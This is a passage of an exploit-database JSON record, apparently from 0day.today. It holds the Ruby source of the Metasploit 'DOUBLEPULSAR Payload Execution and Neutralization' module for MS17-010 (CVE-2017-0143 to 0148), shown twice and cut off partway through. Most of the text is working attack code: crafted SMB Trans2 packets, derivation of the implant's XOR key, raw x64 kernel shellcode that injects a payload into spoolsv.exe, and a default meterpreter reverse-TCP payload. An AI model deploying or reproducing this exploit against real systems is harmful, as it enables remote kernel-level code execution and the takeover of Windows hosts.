base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-02] #"}, "lastseen": "2021-09-01T22:15:27", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "aece96ec7a987e45d8f994ba1a28c0f8", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-02T22:14:33", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142603"]}, {"type": "nessus", "idList": ["700059.PRM", 
"700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "exploitdb", "idList": ["EDB-ID:42031", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-02T22:14:33", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-02T22:14:33", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: 
https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n 